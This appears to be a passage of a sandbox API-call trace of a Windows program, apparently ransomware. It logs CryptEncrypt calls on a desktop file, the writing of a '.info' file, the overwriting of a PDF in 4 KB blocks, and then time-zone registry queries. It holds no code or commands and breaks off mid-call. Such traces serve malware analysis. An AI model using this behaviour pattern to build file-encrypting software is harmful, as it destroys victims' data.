hFile=0x3d4, lpBuffer=0x2232118, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2232118*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0058.745] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x225d8c0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x225d8c0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0058.745] CryptEncrypt (in: hKey=0x1a5d32b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x225d910*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x225d910*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0058.745] WriteFile (in: hFile=0x408, lpBuffer=0x225d960*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x225d960*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0058.745] CloseHandle (hObject=0x408) returned 1 [0058.747] CloseHandle (hObject=0x3d4) returned 1 [0058.747] CryptDestroyKey (hKey=0x1a5d3080) returned 1 [0058.747] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0058.747] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0058.854] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", lpFilePart=0x0) returned 0x46 [0058.854] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0058.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0058.855] GetFileType (hFile=0x3d4) returned 0x1 [0058.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0058.855] GetFileType (hFile=0x3d4) returned 0x1 [0058.855] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.856] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.857] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.858] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.859] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.860] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.861] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0058.862] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x720, lpOverlapped=0x0) returned 1 [0058.862] ReadFile (in: hFile=0x3d4, lpBuffer=0x225f168, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x225f168*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0058.862] CloseHandle (hObject=0x3d4) returned 1 [0067.336] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239.info", lpFilePart=0x0) returned 0x4b [0067.337] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0067.337] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0067.338] GetFileType (hFile=0x3d4) returned 0x1 [0067.338] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d650) returned 1 [0067.338] GetFileType (hFile=0x3d4) returned 0x1 [0067.656] WriteFile (in: hFile=0x3d4, lpBuffer=0x2274220*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5d7b8, lpOverlapped=0x0 | out: lpBuffer=0x2274220*, lpNumberOfBytesWritten=0x1bf5d7b8*=0x77d, lpOverlapped=0x0) returned 1 [0067.698] CloseHandle (hObject=0x3d4) returned 1 [0068.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5da70) returned 1 [0068.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), fInfoLevelId=0x0, lpFileInformation=0x1bf5db50 | out: lpFileInformation=0x1bf5db50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x761a2300, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xed9262c0, ftLastAccessTime.dwHighDateTime=0x1d4c728, ftLastWriteTime.dwLowDateTime=0xed9262c0, ftLastWriteTime.dwHighDateTime=0x1d4c728, nFileSizeHigh=0x0, nFileSizeLow=0x1771d)) returned 1 [0068.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da30) returned 1 [0068.341] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.341] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", dwFileAttributes=0x80) returned 1 [0068.407] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.408] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5dab0) returned 1 [0068.408] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), fInfoLevelId=0x0, lpFileInformation=0x227c070 | out: lpFileInformation=0x227c070*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x761a2300, ftCreationTime.dwHighDateTime=0x1d4cc63, ftLastAccessTime.dwLowDateTime=0xed9262c0, ftLastAccessTime.dwHighDateTime=0x1d4c728, ftLastWriteTime.dwLowDateTime=0xed9262c0, ftLastWriteTime.dwHighDateTime=0x1d4c728, nFileSizeHigh=0x0, nFileSizeLow=0x1771d)) returned 1 [0068.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5da70) returned 1 [0068.409] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9a0) returned 1 [0068.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.409] GetFileType (hFile=0x3d4) returned 0x1 [0068.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d910) returned 1 [0068.409] GetFileType (hFile=0x3d4) returned 0x1 [0068.410] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0068.410] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.412] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.413] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.413] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.414] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.415] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.416] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.416] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.417] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.418] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.419] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.419] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.420] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.421] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.422] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.422] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.423] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.424] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.425] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.425] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.426] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.427] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.428] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.428] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5daa8*=0x800, lpOverlapped=0x0) returned 1 [0068.428] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0068.429] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.430] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.430] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.431] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.432] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.433] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.433] WriteFile (in: hFile=0x3d4, lpBuffer=0x227c508*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x227c508*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0068.435] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0068.436] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0068.436] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0068.437] SetEndOfFile (hFile=0x3d4) returned 1 [0068.444] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0068.444] CloseHandle (hObject=0x3d4) returned 1 [0068.445] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x1bf5d6c8 | out: pTimeZoneInformation=0x1bf5d6c8) returned 0x2 [0068.461] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bf5d698 | out: phkResult=0x1bf5d698*=0x3d4) returned 0x0 [0068.462] RegQueryValueExW (in: hKey=0x3d4, lpValueName="TZI", lpReserved=0x0, lpType=0x1bf5d6d8, lpData=0x0, lpcbData=0x1bf5d6d0*=0x0 | out: lpType=0x1bf5d6d8*=0x3, lpData=0x0, lpcbData=0x1bf5d6d0*=0x2c) returned 0x0 [0068.462] RegQueryValueExW (in: hKey=0x3d4, lpValueName="TZI", lpReserved=0x0, lpType=0x1bf5d6d8, lpData=0x227e528, lpcbData=0x1bf5d6d0*=0x2c | out: lpType=0x1bf5d6d8*=0x3, lpData=0x227e528*, lpcbData=0x1bf5d6d0*=0x2c) returned 0x0 [0068.462] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bf5d498 | out: phkResult=0x1bf5d498*=0x408) returned 0x0 [0068.462] RegQueryValueExW (in: hKey=0x408, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x0, lpcbData=0x1bf5d4d0*=0x0 | out: lpType=0x1bf5d4d8*=0x4, lpData=0x0, lpcbData=0x1bf5d4d0*=0x4) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x1bf5d4b8, lpcbData=0x1bf5d4d0*=0x4 | out: lpType=0x1bf5d4d8*=0x4, lpData=0x1bf5d4b8*=0x7d7, lpcbData=0x1bf5d4d0*=0x4) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="LastEntry", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x0, lpcbData=0x1bf5d4d0*=0x0 | out: lpType=0x1bf5d4d8*=0x4, lpData=0x0, lpcbData=0x1bf5d4d0*=0x4) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="LastEntry", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x1bf5d4b8, lpcbData=0x1bf5d4d0*=0x4 | out: 